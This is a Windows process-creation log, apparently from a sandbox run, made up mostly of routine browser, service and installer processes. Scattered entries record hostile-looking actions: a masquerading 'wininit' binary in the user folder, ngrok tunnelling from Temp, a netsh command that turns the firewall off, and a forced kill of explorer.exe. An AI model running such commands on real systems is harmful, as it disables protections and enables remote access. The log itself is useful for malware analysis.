"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.0.275924726\917746860" -parentBuildID 20230214051806 -prefsHandle 1752 -prefMapHandle 1744 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f0142e1-51f5-4ec3-9240-3e5e170c2355} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 1832 2df908c2858 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.1.146440821\700021077" -parentBuildID 20230214051806 -prefsHandle 2344 -prefMapHandle 2340 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88228470-3a94-48c2-b42f-cd6066af08aa} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 2356 2df84785358 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.2.174747166\75368795" -childID 1 -isForBrowser -prefsHandle 2924 -prefMapHandle 2920 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c50e683e-16a6-4807-8b63-45b3edac4281} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 2932 2df90490858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.3.1045039126\2053172858" -childID 2 -isForBrowser -prefsHandle 3424 -prefMapHandle 2640 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0828b270-9068-404c-922d-c0873986b2aa} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 3576 2df96e88e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.4.956959532\118798927" -childID 3 -isForBrowser -prefsHandle 5072 -prefMapHandle 5140 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e46252ef-72b1-476d-bb54-b84fc28aa8df} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 5116 2df986fd958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.5.1044836342\55105560" -childID 4 -isForBrowser -prefsHandle 5304 -prefMapHandle 5308 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff55e700-1976-4735-a9f5-a3e9997cdceb} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 5296 2df995d4058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.6.195823850\321816344" -childID 5 -isForBrowser -prefsHandle 5500 -prefMapHandle 5508 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3070917a-f0f1-41f9-840e-35d48d427941} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 5492 2df995d5558 tab

C:\Windows\system32\DisplaySwitch.exe

DisplaySwitch.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicePickerUserSvc

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} -Embedding

C:\Windows\System32\oobe\UserOOBEBroker.exe

C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding

C:\Windows\system32\DisplaySwitch.exe

DisplaySwitch.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbde65ab58,0x7ffbde65ab68,0x7ffbde65ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1632 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1896 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2248 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4220 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4204 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4384 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Windows\system32\DisplaySwitch.exe

DisplaySwitch.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4656 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Windows\System32\taskkill.exe

"C:\Windows\System32\taskkill.exe" /im ngrok.exe /f

C:\Users\Admin\AppData\Local\Temp\ngrok.exe

"C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken 123

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4648 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3248 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:2

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004C0

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.7.1851671827\701759316" -childID 6 -isForBrowser -prefsHandle 2792 -prefMapHandle 3460 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1df09990-1432-4313-a635-c2059cb27809} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 4028 2df93bc0e58 tab

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.0.875357676\303355245" -parentBuildID 20230214051806 -prefsHandle 1708 -prefMapHandle 1700 -prefsLen 22484 -prefMapSize 235208 -appDir "C:\Program Files\Mozilla Firefox\browser" - {93fc92f8-cbb9-4b24-bee8-777acb20e8d9} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 1608 1ef07922f58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.1.1069390618\1963344058" -parentBuildID 20230214051806 -prefsHandle 2208 -prefMapHandle 2204 -prefsLen 22484 -prefMapSize 235208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2970c55d-932a-4d23-919e-f7a587a32025} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 2232 1ef7b88a558 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.2.941851982\615664076" -childID 1 -isForBrowser -prefsHandle 3020 -prefMapHandle 3036 -prefsLen 22880 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3cdd5409-6d6f-4469-92cd-90d1d85fca3b} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 2684 1ef0ba0ff58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.3.81376150\1612812879" -childID 2 -isForBrowser -prefsHandle 3496 -prefMapHandle 3492 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa3a21f2-9a72-4aa5-8755-53d11ea2a0aa} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 3504 1ef0dce6b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.4.45621807\671645759" -childID 3 -isForBrowser -prefsHandle 5024 -prefMapHandle 5020 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a59a5da-b104-4d53-93b6-b014ab6575ef} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5040 1ef0fa7fe58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.5.600051033\1718866529" -childID 4 -isForBrowser -prefsHandle 5172 -prefMapHandle 5176 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6484e38d-8cb9-4fc1-831c-68f6f3af92ab} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5160 1ef10416858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.6.551616193\149894371" -childID 5 -isForBrowser -prefsHandle 5448 -prefMapHandle 5444 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a25afb83-826c-4a83-895c-942200efa723} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5456 1ef104c7658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.7.912271151\633927157" -childID 6 -isForBrowser -prefsHandle 5784 -prefMapHandle 5780 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c24ecb8-16db-40d4-994d-502de461cb3f} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5796 1ef11c18b58 tab

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{B175520C-86A2-35A7-8619-86DC379688B9}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{7DAD0258-515C-3DD4-8964-BD714199E0F7}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{AC76BA86-7AD7-1033-7B44-AC0F074E4100}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{9F51D16B-42E8-4A4A-8228-75045541A2AE}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{64A3A4F4-B792-11D6-A78A-00B0D0180381}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{1D8E6291-B0D5-35EC-8441-6616F567A0F7}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{9BE518E6-ECC6-35A9-88E4-87755C07200F}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{37B8F9C7-03FB-3253-8781-2517C99D7C00}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{662A0088-6FCD-45DD-9EA7-68674058AED5}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{BF08E976-B92E-4336-B56F-2171179476C4}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{CB0836EC-B072-368D-82B2-D3470BF95707}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{71024AE4-039E-4CA4-87B4-2F64180401F0}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{E634F316-BEB6-4FB3-A612-F7102F576165}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{90160000-008C-0000-1000-0000000FF1CE}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{90160000-007E-0000-1000-0000000FF1CE}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{90160000-008C-0409-1000-0000000FF1CE}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{2BB73336-4F69-4141-9797-E9BD6FE3980A}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{79043ED0-7ED1-4227-A5E5-04C5594D21F7}

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 0C93C95AA9B3BF6000ACEC914446538C C

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding A4D5730D607D76DDADAA17EE79C5FE17 C

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 310125655B2F474F23CB7EC4DCD9D7AE C

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.8.1573044007\100775569" -childID 7 -isForBrowser -prefsHandle 5040 -prefMapHandle 5036 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {311fdcdc-bbe3-4852-93d5-73d4996f42fc} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5976 1ef11910e58 tab

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding DC06E923884A576777AA1E132CB348BE

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.9.2043715575\431917272" -childID 8 -isForBrowser -prefsHandle 5044 -prefMapHandle 5592 -prefsLen 28355 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ad75d3f-f144-4516-a0d4-7d3da1d8e175} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5412 1ef11c17058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.10.793236605\301440004" -childID 9 -isForBrowser -prefsHandle 6196 -prefMapHandle 6200 -prefsLen 28355 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a563a5d-c25e-46dd-ba6f-497ba25cd0bd} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 6184 1ef12467e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.11.1801255500\1584993984" -childID 10 -isForBrowser -prefsHandle 6472 -prefMapHandle 6468 -prefsLen 28355 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {374b3ad8-02ac-4ab0-a3c6-34957b555433} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 6480 1ef0f41fe58 tab

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\Downloads\aida64extreme730.exe

"C:\Users\Admin\Downloads\aida64extreme730.exe"

C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp

"C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp" /SL5="$30174,51859982,56832,C:\Users\Admin\Downloads\aida64extreme730.exe"

C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe

"C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe"

C:\Windows\System32\ie4uinit.exe

"C:\Windows\System32\ie4uinit.exe" -ClearIconCache

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4460 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:1

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3420 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3728 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4756.0.1557007371\591080285" -parentBuildID 20230214051806 -prefsHandle 1696 -prefMapHandle 1688 -prefsLen 24458 -prefMapSize 235380 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cea7204e-4409-4070-a27f-af8dc63def01} 4756 "\\.\pipe\gecko-crash-server-pipe.4756" 1780 236d7524858 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4756.1.401038634\374382183" -parentBuildID 20230214051806 -prefsHandle 2220 -prefMapHandle 2216 -prefsLen 24458 -prefMapSize 235380 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4f82b78-7d51-47a4-9223-80a1da0b272b} 4756 "\\.\pipe\gecko-crash-server-pipe.4756" 2232 236cb289658 socket

C:\Program Files\Mozilla Firefox\firefox.exe

